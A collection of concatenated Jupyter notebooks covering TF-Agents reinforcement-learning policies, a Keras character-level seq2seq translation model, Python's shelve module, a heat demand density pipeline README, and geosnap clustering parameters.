pl.plot(t, y[2::3]+mean+0.5, '.')
|
notebooks/bic.ipynb
|
# + [markdown] colab_type="text" id="1Pi_B2cvdBiW"
# ##### Copyright 2018 The TF-Agents Authors.
# + [markdown] colab_type="text" id="f5926O3VkG_p"
# ### Get Started
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/agents/blob/master/tf_agents/colabs/policies_tutorial.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/agents/blob/master/tf_agents/colabs/policies_tutorial.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td>
# </table>
# + colab={} colab_type="code" id="xsLTHlVdiZP3"
# Note: If you haven't installed tf-agents yet, run:
# !pip install tf-agents
# + [markdown] colab_type="text" id="lEgSa5qGdItD"
# ### Imports
# + colab={} colab_type="code" id="sdvop99JlYSM"
import abc
import tensorflow as tf
import tensorflow_probability as tfp
nest = tf.contrib.framework.nest
slim = tf.contrib.slim
import numpy as np
from tf_agents.specs import array_spec
from tf_agents.specs import tensor_spec
from tf_agents.environments import time_step as ts
from tf_agents.networks import network
from tf_agents.policies import py_policy
from tf_agents.policies import random_py_policy
from tf_agents.policies import scripted_py_policy
from tf_agents.policies import tf_policy
from tf_agents.policies import random_tf_policy
from tf_agents.policies import actor_policy
from tf_agents.policies import q_policy
from tf_agents.policies import greedy_policy
from tf_agents.policies import py_tf_policy
# Clear any leftover state from previous colabs run.
# (This is not necessary for normal programs.)
tf.reset_default_graph()
# + [markdown] colab_type="text" id="31uij8nIo5bG"
# # Introduction
# + [markdown] colab_type="text" id="PqFn7q5bs3BF"
# In Reinforcement Learning terminology, policies map an observation from the environment to an action or a distribution over actions. In TF-Agents, observations from the environment are contained in a named tuple `TimeStep('step_type', 'discount', 'reward', 'observation')`, and policies map timesteps to actions or distributions over actions. Most policies use `timestep.observation`, some policies use `timestep.step_type` (e.g. to reset the state at the beginning of an episode in stateful policies), but `timestep.discount` and `timestep.reward` are usually ignored.
#
# Policies are related to other components in TF-Agents in the following way. Most policies have a neural network to compute actions and/or distributions over actions from TimeSteps. Agents can contain one or more policies for different purposes, e.g. a main policy that is being trained for deployment, and a noisy policy for data collection. Policies can be saved/restored, and can be used independently of the agent for data collection, evaluation etc.
#
# Some policies are easier to write in Tensorflow (e.g. those with a neural network), whereas others are easier to write in Python (e.g. following a script of actions). So in TF agents, we allow both Python and Tensorflow policies. Moreover, policies written in TensorFlow might have to be used in a Python environment, or vice versa, e.g. a TensorFlow policy is used for training but later deployed in a production python environment. To make this easier, we provide wrappers for converting between python and TensorFlow policies.
#
# Another interesting class of policies are policy wrappers, which modify a given policy in a certain way, e.g. add a particular type of noise, make a greedy or epsilon-greedy version of a stochastic policy, randomly mix multiple policies etc.
#
# See also:
#
# Different ways of running a policy in an environment (TODO: separate colab. Shows in-graph, eager and python data collection/evaluation.)
# + [markdown] colab_type="text" id="NyXO5-Aalb-6"
# # Python Policies
# + [markdown] colab_type="text" id="DOtUZ1hs02bu"
# The interface for Python policies is defined in `policies/py_policy.Base`. The main methods are:
#
#
# + colab={} colab_type="code" id="4PqNEVls1uqc"
class Base(object):
    """Abstract interface for Python policies.

    A policy maps a TimeStep from the environment to a
    PolicyStep(action, state, info) named tuple.
    """
    @abc.abstractmethod
    def __init__(self, time_step_spec, action_spec, policy_state_spec=()):
        # NOTE(review): the abstractmethod decorators document intent only;
        # the class does not use ABCMeta, so instantiation is not prevented.
        self._time_step_spec = time_step_spec
        self._action_spec = action_spec
        self._policy_state_spec = policy_state_spec
    @abc.abstractmethod
    def reset(self, policy_state=()):
        """Return an initial policy state."""
        # return initial_policy_state.
        pass
    @abc.abstractmethod
    def action(self, time_step, policy_state=()):
        """Map a time_step to a PolicyStep(action, state, info) named tuple."""
        # return a PolicyStep(action, state, info) named tuple.
        pass
    @abc.abstractmethod
    def distribution(self, time_step, policy_state=()):
        """Return a distribution over actions (TF policies only)."""
        # Not implemented in python, only for TF policies.
        pass
    @abc.abstractmethod
    def update(self, policy):
        """Update self to be similar to the input `policy`."""
        # update self to be similar to the input `policy`.
        pass
    @abc.abstractmethod
    def copy(self):
        """Return a copy of self."""
        # return a copy of self.
        pass
    @property
    def time_step_spec(self):
        """Spec of the input TimeStep."""
        return self._time_step_spec
    @property
    def action_spec(self):
        """Spec of the output action."""
        return self._action_spec
    @property
    def policy_state_spec(self):
        """Spec of the policy state."""
        return self._policy_state_spec
# + [markdown] colab_type="text" id="16kyDKk65bka"
# The most important method is `action(time_step)` which maps a `time_step` containing an observation from the environment to a PolicyStep named tuple containing the following attributes:
#
# * `action`: The action to be applied to the environment.
# * `state`: The state of the policy (e.g. RNN state) to be fed into the next call to action.
# * `info`: Optional side information such as action log probabilities.
#
# TODO: Add examples of stateful policies, and explain `state` and `info` in more detail.
#
# The `time_step_spec` and `action_spec` are specifications for the input time step and the output action. Policies also have a `reset` function which is typically used for resetting the state in stateful policies. The `copy` function returns a copy of `self` and the `update(new_policy)` function updates `self` towards `new_policy`.
#
# Now, let us look at a couple of examples of python policies.
#
# + [markdown] colab_type="text" id="YCH1Hs_WlmDT"
# ## Example 1: Random Python Policy
# + [markdown] colab_type="text" id="lbnQ0BQ3_0N2"
# A simple example of a `PyPolicy` is the `RandomPyPolicy` which generates random actions for the discrete/continuous given action_spec. The input `time_step` is ignored.
# + colab={} colab_type="code" id="QX8M4Nl-_0uu"
# RandomPyPolicy: samples uniformly within the bounded action spec; the
# input time_step is ignored (None is fine here).
action_spec = array_spec.BoundedArraySpec((2,), np.int32, -10, 10)
# Is there a way to avoid `my` in the variable names?
my_random_py_policy = random_py_policy.RandomPyPolicy(time_step_spec=None,
                                                      action_spec=action_spec)
time_step = None
action_step = my_random_py_policy.action(time_step)
print(action_step)
# A second call draws a fresh random action.
action_step = my_random_py_policy.action(time_step)
print(action_step)
# + [markdown] colab_type="text" id="B8WrFOR1lz31"
# ## Example 2: Scripted Python Policy
# + [markdown] colab_type="text" id="AJ0Br1lGBnTT"
# A scripted policy plays back a script of actions represented as a list of `(num_repeats, action)` tuples. Every time the `action` function is called, it returns the next action from the list until the specified number of repeats is done, and then moves on to the next action in the list. The `reset` method can be called to start executing from the beginning of the list.
# + colab={} colab_type="code" id="_mZ244m4BUYv"
# ScriptedPyPolicy: replays a fixed list of (num_repeats, action) pairs.
action_spec = array_spec.BoundedArraySpec((2,), np.int32, -10, 10)
action_script = [(1, np.array([5, 2], dtype=np.int32)),
                 (0, np.array([0, 0], dtype=np.int32)), # Setting `num_repeats` to 0 will skip this action.
                 (2, np.array([1, 2], dtype=np.int32)),
                 (1, np.array([3, 4], dtype=np.int32))]
my_scripted_py_policy = scripted_py_policy.ScriptedPyPolicy(
    time_step_spec=None, action_spec=action_spec, action_script=action_script)
policy_state = my_scripted_py_policy.get_initial_state()
time_step = None
print('Executing scripted policy...')
action_step = my_scripted_py_policy.action(time_step, policy_state)
print(action_step)
# The returned state tracks the position in the script; thread it through.
action_step= my_scripted_py_policy.action(time_step, action_step.state)
print(action_step)
action_step = my_scripted_py_policy.action(time_step, action_step.state)
print(action_step)
print('Resetting my_scripted_py_policy...')
# A fresh initial state restarts playback from the top of the script.
policy_state = my_scripted_py_policy.get_initial_state()
action_step = my_scripted_py_policy.action(time_step, policy_state)
print(action_step)
# + [markdown] colab_type="text" id="3Dz7HSTZl6aU"
# # TensorFlow Policies
# + [markdown] colab_type="text" id="LwcoBXqKl8Yb"
# TensorFlow policies follow the same interface as Python policies. Let us look at a few examples.
# + [markdown] colab_type="text" id="3x8pDWEFrQ5C"
# ## Example 1: Random TF Policy
#
# A RandomTFPolicy can be used to generate random actions according to a given discrete/continuous `action_spec`. The input `time_step` is ignored.
#
#
# + colab={} colab_type="code" id="nZ3pe5G4rjrW"
# RandomTFPolicy: samples uniformly from the bounded action spec.
action_spec = tensor_spec.BoundedTensorSpec(
    (2,), tf.float32, minimum=-1, maximum=3)
observation_spec = tensor_spec.TensorSpec((2,), tf.float32)
time_step_spec = ts.time_step_spec(observation_spec)
my_random_tf_policy = random_tf_policy.RandomTFPolicy(
    action_spec=action_spec, time_step_spec=time_step_spec)
observation = tf.ones(time_step_spec.observation.shape)
time_step = ts.restart(observation)
action_step = my_random_tf_policy.action(time_step)
# TF1-style graph mode: action_step holds graph ops until run in a session.
with tf.Session() as sess:
    print(action_step)
    # Generate an action
    print(sess.run(action_step))
    # Generate a different action
    print(sess.run(action_step))
# + [markdown] colab_type="text" id="GOBoWETprWCB"
# ## Example 2: Actor Policy
#
# An actor policy can be created using either a network that maps `time_steps` to actions or a network that maps `time_steps` to distributions over actions.
#
# + [markdown] colab_type="text" id="2S94E5zQgge_"
# ### Using an action network
# + [markdown] colab_type="text" id="X2LM5STNgv1u"
# Let us define a network as follows:
# + colab={} colab_type="code" id="S2wFgzJFteQX"
class ActionNet(network.Network):
    """Maps observations to actions in [-1, 1] via a single tanh Dense layer."""
    def __init__(self, observation_spec, action_spec):
        super(ActionNet, self).__init__(
            observation_spec=observation_spec,
            action_spec=action_spec,
            state_spec=(),
            name='ActionNet')
        # One Dense layer sized to the flat action dimension; tanh keeps
        # outputs in [-1, 1].
        self._layers = [
            tf.keras.layers.Dense(
                action_spec.shape.num_elements(), activation=tf.nn.tanh),
        ]
    def call(self, observations, step_type, network_state):
        """Compute a batch of actions; step_type is ignored, network_state
        is passed through unchanged."""
        del step_type
        output = tf.to_float(observations)  # tf.to_float is TF1-era API
        # NOTE(review): iterates `self.layers` while __init__ sets
        # `self._layers`; presumably the base Network exposes the former --
        # confirm against network.Network.
        for layer in self.layers:
            output = layer(output)
        actions = tf.reshape(output, [-1] + self.action_spec.shape.as_list())
        # Scale and shift actions to the correct range if necessary.
        return actions, network_state
# + [markdown] colab_type="text" id="k7fIn-ybVdC6"
# In TensorFlow most network layers are designed for batch operations, so we expect the input time_steps to be batched, and the output of the network will be batched as well. Also the network is responsible for producing actions in the correct range of the given action_spec. This is conventionally done using e.g. a tanh activation for the final layer to produce actions in [-1, 1] and then scaling and shifting this to the correct range as the input action_spec (e.g. see `tf_agents/agents/ddpg/networks.actor_network()`).
#
# Now, we an create an actor policy using the above network.
# + colab={} colab_type="code" id="0UGmFTe7a5VQ"
# Specs: 4-D float observation; 3-D continuous action in [-1, 1]
# (matching ActionNet's tanh output range).
observation_spec = tensor_spec.TensorSpec((4,), tf.float32)
time_step_spec = ts.time_step_spec(observation_spec)
action_spec = tensor_spec.BoundedTensorSpec((3,),
                                            tf.float32,
                                            minimum=-1,
                                            maximum=1)
action_net = ActionNet(observation_spec, action_spec)
my_actor_policy = actor_policy.ActorPolicy(
    time_step_spec=time_step_spec,
    action_spec=action_spec,
    actor_network=action_net)
# + [markdown] colab_type="text" id="xlmGPTAmfPK3"
# We can apply it to any batch of time_steps that follow time_step_spec:
# + colab={} colab_type="code" id="fvsIsR0VfOA4"
batch_size = 2
# NOTE(review): literal 2 here duplicates batch_size -- keep them in sync.
observations = tf.ones([2] + time_step_spec.observation.shape.as_list())
# TODO: Why doesn't restart infer batch_size from observations?
time_step = ts.restart(observations, batch_size)
action_step = my_actor_policy.action(time_step)
distribution_step = my_actor_policy.distribution(time_step)
print('Action distribution:')
print(distribution_step)
with tf.Session() as sess:
    # Dense-layer variables must be initialized before running the ops.
    sess.run(tf.global_variables_initializer())
    print('Action:')
    print(sess.run(action_step))
    print('Another action (same because it is deterministic):')
    print(sess.run(action_step))
# + [markdown] colab_type="text" id="lumtyhejZOXR"
# In the above example, we created the policy using an action network that produces an action tensor. In this case, `policy.distribution(time_step)` is a deterministic (delta) distribution around the output of `policy.action(time_step)`. One way to produce a stochastic policy is to wrap the actor policy in a policy wrapper that adds noise to the actions (see XXX). Another way is to create the actor policy using an action distribution network instead of an action network as shown below.
# + [markdown] colab_type="text" id="_eNrJ5gKgl3W"
# ### Using an action distribution network
# + colab={} colab_type="code" id="sSYzC9LobVsK"
class ActionDistributionNet(ActionNet):
    """Same mapping as ActionNet, but wraps the deterministic output in a
    unit-variance Normal distribution over actions."""

    def call(self, observations, step_type, network_state):
        # Reuse the parent network to compute the distribution means.
        means, network_state = super(ActionDistributionNet, self).call(
            observations, step_type, network_state)
        # Fixed standard deviation of 1 for every action dimension.
        stddevs = tf.ones_like(means)
        dist = tfp.distributions.Normal(means, stddevs)
        return dist, network_state
action_distribution_net = ActionDistributionNet(observation_spec, action_spec)
my_actor_policy = actor_policy.ActorPolicy(
time_step_spec=time_step_spec,
action_spec=action_spec,
actor_network=action_distribution_net)
action_step = my_actor_policy.action(time_step)
distribution_step = my_actor_policy.distribution(time_step)
print('Action distribution:')
print(distribution_step)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print('Action:')
print(sess.run(action_step))
print('Another action (different, but sampled from the same distribution):')
print(sess.run(action_step))
# + [markdown] colab_type="text" id="BzoNGJnlibtz"
# Note that in the above, actions are clipped to the range of the given action spec [-1, 1]. This is because a constructor argument of ActorPolicy clip=True by default. Setting this to false will return unclipped actions produced by the network.
# + [markdown] colab_type="text" id="PLj6A-5domNG"
# Stochastic policies can be converted to deterministic policies using, for example, a GreedyPolicy wrapper which chooses `stochastic_policy.distribution().mode()` as its action, and a deterministic/delta distribution around this greedy action as its `distribution()`.
# + [markdown] colab_type="text" id="4Xxzo2a7rZ7v"
# ## Example 3: Q Policy
# + [markdown] colab_type="text" id="79eGLqpOhQVp"
# A Q policy is used in agents like DQN and is based on a Q network that predicts a Q value for each discrete action. For a given time step, the action distribution in the Q Policy is a categorical distribution created using the q values as logits.
#
#
# + colab={} colab_type="code" id="Haakr2VvjqKC"
# Specs: 4-D float observation; one discrete action drawn from {-1, 0, 1}.
observation_spec = tensor_spec.TensorSpec((4,), tf.float32)
time_step_spec = ts.time_step_spec(observation_spec)
action_spec = tensor_spec.BoundedTensorSpec((1,),
                                            tf.int32,
                                            minimum=-1,
                                            maximum=1)
# Bounds are inclusive, so there are maximum - minimum + 1 = 3 actions.
num_actions = action_spec.maximum - action_spec.minimum + 1
class QNetwork(network.Network):
    """Stateless network that predicts one Q value (logit) per discrete
    action for each batched observation."""

    def __init__(self, observation_spec, action_spec, num_actions=2, name=None):
        super(QNetwork, self).__init__(
            observation_spec=observation_spec,
            action_spec=action_spec,
            state_spec=(),
            name=name)
        # One dense output per action, appended to the base class's layer list.
        self._layers.append(tf.keras.layers.Dense(num_actions))

    def call(self, inputs, unused_step_type=None, network_state=()):
        inputs = tf.cast(inputs, tf.float32)
        for layer in self.layers:
            inputs = layer(inputs)
        # Returns per-action Q values (used as categorical logits by QPolicy).
        return inputs, network_state
batch_size = 2
observation = tf.ones([batch_size] + time_step_spec.observation.shape.as_list())
time_steps = ts.restart(observation, batch_size=batch_size)
my_q_network = QNetwork(
    observation_spec=observation_spec,
    action_spec=action_spec)
# QPolicy turns per-action Q values into a categorical action distribution.
my_q_policy = q_policy.QPolicy(
    time_step_spec, action_spec, q_network=my_q_network)
action_step = my_q_policy.action(time_steps)
distribution_step = my_q_policy.distribution(time_steps)
print('Action distribution:')
print(distribution_step)
with tf.Session() as sess:
    # Initialize the dense layer's variables before evaluating.
    sess.run(tf.global_variables_initializer())
    print('Action:')
    print(sess.run(action_step))
# + [markdown] colab_type="text" id="Xpu9m6mvqJY-"
# # Policy Wrappers
# + [markdown] colab_type="text" id="OfaUrqRAoigk"
# A policy wrapper can be used to wrap and modify a given policy, e.g. add noise. Policy wrappers are a subclass of Policy (Python/TensorFlow) and can therefore be used just like any other policy.
# + [markdown] colab_type="text" id="-JJVVAALqVNQ"
# ## Example: Greedy Policy
#
#
# A greedy wrapper can be used to wrap any TensorFlow policy that implements `distribution()`. `GreedyPolicy.action()` will return `wrapped_policy.distribution().mode()` and `GreedyPolicy.distribution()` is a deterministic/delta distribution around `GreedyPolicy.action()`:
# + colab={} colab_type="code" id="xsRPBeLZtXvu"
# GreedyPolicy deterministically picks the mode of the wrapped policy's
# distribution (here: the argmax-Q action of my_q_policy).
my_greedy_policy = greedy_policy.GreedyPolicy(my_q_policy)
action_step = my_greedy_policy.action(time_steps)
distribution_step = my_greedy_policy.distribution(time_steps)
print('action distribution:')
print(distribution_step)
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    print('action:')
    print(sess.run(action_step))
# + [markdown] colab_type="text" id="9S1nuBWWv7hx"
# ## Example: Noise Policy
#
#
# + [markdown] colab_type="text" id="v4apnYjbzd1Q"
# TODO: Either use the existing OUNoise policy (a little complex and out of the blue) or implement a simpler noise policy.
# + [markdown] colab_type="text" id="aO2SLKMev_QI"
# For other common examples of wrappers see:
# 1. EpsilonGreedyPolicy: Like Greedy policy, but sometimes (with probability epsilon) chooses a random action.
# 2. MixturePolicy: Takes a list of policies and generates an action from one of these at random.
# + [markdown] colab_type="text" id="WgpZtEr2mBML"
#
# # Wrapping a TFPolicy as a Python Policy
# + [markdown] colab_type="text" id="BJ8ApdrO-qF8"
# Most policies are written in TensorFlow because they contain one or more networks to be trained. However, we may still need to use these policies in a python environment, e.g. to collect data, deployment or evaluation. The PyTFPolicy class can be used to wrap any TF policy as a PyPolicy object.
# + colab={} colab_type="code" id="Tc96-0Sb0eX_"
# Wrap the TF policy so it can be driven from plain Python / numpy inputs.
my_py_tf_policy = py_tf_policy.PyTFPolicy(my_random_tf_policy)
observation = np.array([3, 4])
time_step = ts.restart(observation)
# The wrapper needs an explicit session to execute the underlying TF ops.
my_py_tf_policy.session = tf.Session()
action_step = my_py_tf_policy.action(time_step)
print('action:')
print(action_step)
# + [markdown] colab_type="text" id="iGyfO34AwYP_"
# Another way to use TensorFlow policies in python is to save the TF policies as checkpoints and load them as a PyTFCheckpointPolicy. See saving and restoring policies for more details.
# + [markdown] colab_type="text" id="EszYIwrDxJta"
# # Saving and Restoring Policies (TODO: oars)
# + [markdown] colab_type="text" id="Xh2vcLRnAbVe"
#
|
tf_agents/colabs/policies_tutorial.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
from __future__ import print_function
from keras.models import Model
from keras.layers import Input, LSTM, Dense
import numpy as np
# -
# # Param
batch_size = 64 # Batch size for training.
epochs = 100 # Number of epochs to train for.
latent_dim = 256 # Latent dimensionality of the encoding space.
num_samples = 20000 # Number of samples to train on.
# Path to the data txt file on disk.
data_path = 'fra-eng/fra.txt'
# # Data
# Parallel text lists and per-language character vocabularies, filled below.
input_texts = []
target_texts = []
input_characters = set()
target_characters = set()
with open(data_path, 'r', encoding='utf-8') as f:
    lines = f.read().split('\n')
# Notebook inspection: line count and a sample line.
np.array(lines).shape
lines[0]
# - Processing data
# - Processing data
# Build parallel input/target text lists and collect the character
# vocabulary of each language.
for line in lines[: min(num_samples, len(lines) - 1)]:
    # Each corpus line is "english<TAB>french<TAB>attribution";
    # the attribution column is unused.
    input_text, target_text, _attribution = line.split('\t')
    # We use "tab" as the "start sequence" character
    # for the targets, and "\n" as "end sequence" character.
    target_text = '\t' + target_text + '\n'
    input_texts.append(input_text)
    target_texts.append(target_text)
    # Collect unique characters (set.update replaces the manual
    # membership-test-then-add loops; sets deduplicate automatically).
    input_characters.update(input_text)
    target_characters.update(target_text)
# Notebook inspection of the processed corpus.
np.array(input_texts).shape
input_texts[0]
np.array(target_texts).shape
target_texts[0]
input_characters
target_characters
# sorted() accepts any iterable; wrapping in list() first is redundant.
input_characters = sorted(input_characters)
target_characters = sorted(target_characters)
num_encoder_tokens = len(input_characters)
num_decoder_tokens = len(target_characters)
max_encoder_seq_length = max([len(txt) for txt in input_texts])
max_decoder_seq_length = max([len(txt) for txt in target_texts])
print('Number of samples:', len(input_texts))
print('Number of unique input tokens:', num_encoder_tokens)
print('Number of unique output tokens:', num_decoder_tokens)  # typo fix: "t0okens"
print('Max sequence length for inputs:', max_encoder_seq_length)
print('Max sequence length for outputs:', max_decoder_seq_length)
# - Build character dictionary
# char -> integer index lookups used for one-hot encoding below.
input_token_index = dict(
    [(char, i) for i, char in enumerate(input_characters)])
target_token_index = dict(
    [(char, i) for i, char in enumerate(target_characters)])
input_token_index
target_token_index
# # Build encoder & decoder input
# - Init input
# One-hot tensors shaped (num_samples, max_seq_length, vocab_size).
encoder_input_data = np.zeros(
    (len(input_texts), max_encoder_seq_length, num_encoder_tokens),
    dtype='float32')
decoder_input_data = np.zeros(
    (len(input_texts), max_decoder_seq_length, num_decoder_tokens),
    dtype='float32')
decoder_target_data = np.zeros(
    (len(input_texts), max_decoder_seq_length, num_decoder_tokens),
    dtype='float32')
# - One-hot vector
for i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)):
    for t, char in enumerate(input_text):
        encoder_input_data[i, t, input_token_index[char]] = 1.
    # Pad positions past the sequence end with the space character.
    encoder_input_data[i, t + 1:, input_token_index[' ']] = 1.
    for t, char in enumerate(target_text):
        # decoder_target_data is ahead of decoder_input_data by one timestep
        decoder_input_data[i, t, target_token_index[char]] = 1.
        if t > 0:
            # decoder_target_data will be ahead by one timestep
            # and will not include the start character.
            decoder_target_data[i, t - 1, target_token_index[char]] = 1.
    # Pad the remainder of both decoder tensors with the space character.
    decoder_input_data[i, t + 1:, target_token_index[' ']] = 1.
    decoder_target_data[i, t:, target_token_index[' ']] = 1.
# - Print encoder_input_data
input_texts[0]
# ' ': index 0
encoder_input_data[0]
# G: Index 26
encoder_input_data[0][0][26]
# o: Index 58
encoder_input_data[0][1][58]
# - Print decoder_input_data
# \t: start, \n: end
target_texts[0]
# ' ': index 2
decoder_input_data[0]
# V: Index 43
decoder_input_data[0][1][43]
# ' ': index 2
decoder_target_data[0]
# V: Index 43
decoder_target_data[0][0][43]
# # Encode & Decoder (implementation of sequence-to-sequence)
# - Return_state & return_sequences param of LSTM: https://www.dlology.com/blog/how-to-use-return_state-or-return_sequences-in-keras/
# - Encoder states (context vector): initial hidden state of decoder
# - Teacher Forcing: https://towardsdatascience.com/what-is-teacher-forcing-3da6217fed1c
# - Encoder
# Define an input sequence and process it.
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
# We discard `encoder_outputs` and only keep the states.
encoder_states = [state_h, state_c] # Context vector of encoder
# - Decoder
# Set up the decoder, using `encoder_states` as initial state.
decoder_inputs = Input(shape=(None, num_decoder_tokens))
# We set up our decoder to return full output sequences,
# and to return internal states as well. We don't use the
# return states in the training model, but we will use them in inference.
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs,
                                     initial_state=encoder_states)
# Per-timestep softmax over the target character vocabulary.
decoder_dense = Dense(num_decoder_tokens, activation='softmax')
decoder_outputs = decoder_dense(decoder_outputs)
# - Model
# +
# Define the model that will turn
# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
# Run training
model.compile(optimizer='rmsprop', loss='categorical_crossentropy',
              metrics=['accuracy'])
# -
# # Train
import keras.backend.tensorflow_backend as K
# Pin training to the second GPU.
# NOTE(review): assumes a machine with >= 2 GPUs; on a single-GPU box use
# '/gpu:0' or let TensorFlow place the ops automatically.
with K.tf.device('/gpu:1'):
    model.fit([encoder_input_data, decoder_input_data], decoder_target_data,
              batch_size=batch_size,
              epochs=epochs,
              validation_split=0.2)
# Save model
model.save('s2s.h5')
# # Test
# +
# Next: inference mode (sampling).
# Here's the drill:
# 1) encode input and retrieve initial decoder state
# 2) run one step of decoder with this initial state
# and a "start of sequence" token as target.
# Output will be the next target token
# 3) Repeat with the current target token and current states
# Define sampling models
# Encoder model: input sequence -> final LSTM states (the context vector).
encoder_model = Model(encoder_inputs, encoder_states)
# Decoder model: (one-char input, states) -> (next-char distribution,
# new states). Reuses the trained decoder_lstm / decoder_dense weights.
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
decoder_outputs, state_h, state_c = decoder_lstm(
    decoder_inputs, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model(
    [decoder_inputs] + decoder_states_inputs,
    [decoder_outputs] + decoder_states)
# -
# Reverse-lookup token index to decode sequences back to
# something readable.
reverse_input_char_index = dict(
    (i, char) for char, i in input_token_index.items())
reverse_target_char_index = dict(
    (i, char) for char, i in target_token_index.items())
reverse_input_char_index
reverse_target_char_index
def decode_sequence(input_seq):
    """Greedily decode one one-hot-encoded input sequence to a target string.

    Samples one character per decoder step (argmax) until the '\\n' stop
    character is produced or max_decoder_seq_length is exceeded. Relies on
    the module-level `encoder_model`, `decoder_model`, `target_token_index`,
    `reverse_target_char_index`, `num_decoder_tokens` and
    `max_decoder_seq_length`.
    """
    # Encode the input as state vectors.
    states_value = encoder_model.predict(input_seq)
    # Generate empty target sequence of length 1.
    target_seq = np.zeros((1, 1, num_decoder_tokens))
    # Populate the first character of target sequence with the start character.
    target_seq[0, 0, target_token_index['\t']] = 1.
    # Sampling loop for a batch of sequences
    # (to simplify, here we assume a batch of size 1).
    stop_condition = False
    decoded_sentence = ''
    while not stop_condition:
        output_tokens, h, c = decoder_model.predict(
            [target_seq] + states_value)
        # Sample a token (greedy argmax over the vocabulary).
        sampled_token_index = np.argmax(output_tokens[0, -1, :])
        sampled_char = reverse_target_char_index[sampled_token_index]
        decoded_sentence += sampled_char
        # Exit condition: either hit max length
        # or find stop character.
        if (sampled_char == '\n' or
           len(decoded_sentence) > max_decoder_seq_length):
            stop_condition = True
        # Update the target sequence (of length 1).
        target_seq = np.zeros((1, 1, num_decoder_tokens))
        target_seq[0, 0, sampled_token_index] = 1.
        # Update states
        states_value = [h, c]
    return decoded_sentence
# Decode the first 100 training sequences to eyeball translation quality.
for seq_index in range(100):
    # Take one sequence (part of the training set)
    # for trying out decoding.
    input_seq = encoder_input_data[seq_index: seq_index + 1]
    decoded_sentence = decode_sequence(input_seq)
    print('-')
    print('Input sentence:', input_texts[seq_index])
    print('Decoded sentence:', decoded_sentence)
|
Seq2seq_model_keras_character-level.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Shelve
# - Simple key-value database
# - Useful if you don't have sufficient RAM
# - Cannot use integers as keys (but can convert them to a string)
# - Use `del` to delete keys
#
# ## Writing to shelve
# `shelve` was used below but never imported in this notebook.
import shelve

# Write a value under a string key; close() flushes it to disk.
s = shelve.open('data.db')
s['info'] = 55
s.close()
# ## Reading Shelve
# Reopen the same store and read the value back.
s = shelve.open('data.db')
info = s['info']
s.close()
|
notebooks/shelve.ipynb
|
# ---
# jupyter:
# jupytext:
# cell_metadata_filter: -all
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Heat Demand Density
#
# ## What `pipeline.py` is doing:
#
# - Load:
# - Valuation Office Floor Areas
# - Residential Small Area Building Energy Ratings
# - CIBSE TM46 & Guide F Energy Benchmarks
# - Valuation Office Uses linked to Benchmark Categories
# - Local Authority Boundaries
# - Small Area 2016 Boundaries
# - Link Small Areas to Local Authorities
# - Link Valuation Office to Small Areas
# - Apply CIBSE benchmarks to Valuation Office Floor Areas to estimate Non-Residential Heat Demand - *assuming a typical boiler efficiency of 90%*
# - Extract individual building DEAP annual space heat and hot water demand estimates to estimate Residential Heat Demand
# - Amalgamate Heat Demands from individual building level to Small Area level
# - Calculate Demand Density by dividing Small Area Demands by Small Area Polygon Area (km2)
# - Link Small Area Demands to Local Authorities
# - Save Small Area Demands as a GIS-compatible `geojson` map.
#
# ## Caveats
#
# To fully reproduce the pipeline the user must:
# - Have access to the codema-dev s3 to access the underlying Codema-only datasets - *i.e. they need an authenticated AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY*
# - Be comfortable enough with the command line to create a conda environment from an `environment.yml` and run the pipeline with `python pipeline.py`
#
# To open this methodology up to the public, the pipeline could be adapted to fall back to public data when it cannot connect to s3. However, this would only be worthwhile if a UI entry point to the ETL were created to remove the need for command-line usage.
# ## Setup
#
# | ❗ Skip if running on Binder |
# |-------------------------------|
#
# Via [conda](https://github.com/conda-forge/miniforge):
conda env create --file environment.yml
conda activate hdd
# ## Run
# !ploomber build
|
plot-district-heating-viability/README.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
from GEOSNAP2NAM import Aspatial_Clustering_viz
from GEOSNAP2NAM import Aspatial_Clustering_log
# +
#sample = "downloads/LTDB_Std_All_Sample.zip"
#full = "downloads/LTDB_Std_All_fullcount.zip"
#store_ltdb(sample=sample, fullcount=full)
#store_census()
# -
# Analysis parameters for the geosnap neighborhood clustering run.
param = {
    'title': "Neighborhood Analysis: Kmeans, San Diego",
    'filename_suffix': "San Diego",  # "Albertville"
    'state_fips': None,
    'msa_fips': "41740",  # "10700"
    'county_fips': None,
    'years': [1980, 1990, 2000, 2010],  # Available years: 1970, 1980, 1990, 2000 and 2010
    'method': "kmeans",  # affinity_propagation, gaussian_mixture, hdbscan, kmeans, spectral, ward
    'nClusters': 8,  # This option should be commented out for affinity_propagation and hdbscan
